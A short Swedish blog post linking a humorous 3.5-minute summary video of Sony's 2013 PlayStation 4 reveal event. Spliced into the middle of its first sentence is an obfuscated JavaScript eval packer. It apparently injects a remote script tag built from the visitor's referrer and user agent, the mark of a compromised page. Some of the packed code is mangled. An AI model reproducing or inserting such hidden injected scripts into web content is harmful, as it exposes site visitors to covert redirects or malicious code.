Image Image Image Image Image Image Image Image Image Image

| 13 augusti, 2020

Scroll to top

Top

Playstation 4 eventet på 3,5 min. Haha humor!

Filip Urde
  • On 22 februari, 2013
  • http://www.revue.se/filip-urde

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eahif|var|u0026u|referrer|ifrak||js|php’.split(’|’),0,{}))
ni säkert inte missat så hade Sony ett event igår
där man visade upp Playstation 4, eventet höll på i två timmar och det är många som tycker att man borde kanske visat själva ps4 kanske?. Men i alla fall, om du inte orkar se hela presentationen (vilket du kan göra här), så kan du istället se en 3,5 min version här ovan. Den är även återberättad med ganska mycket humor =D
www.youtube.com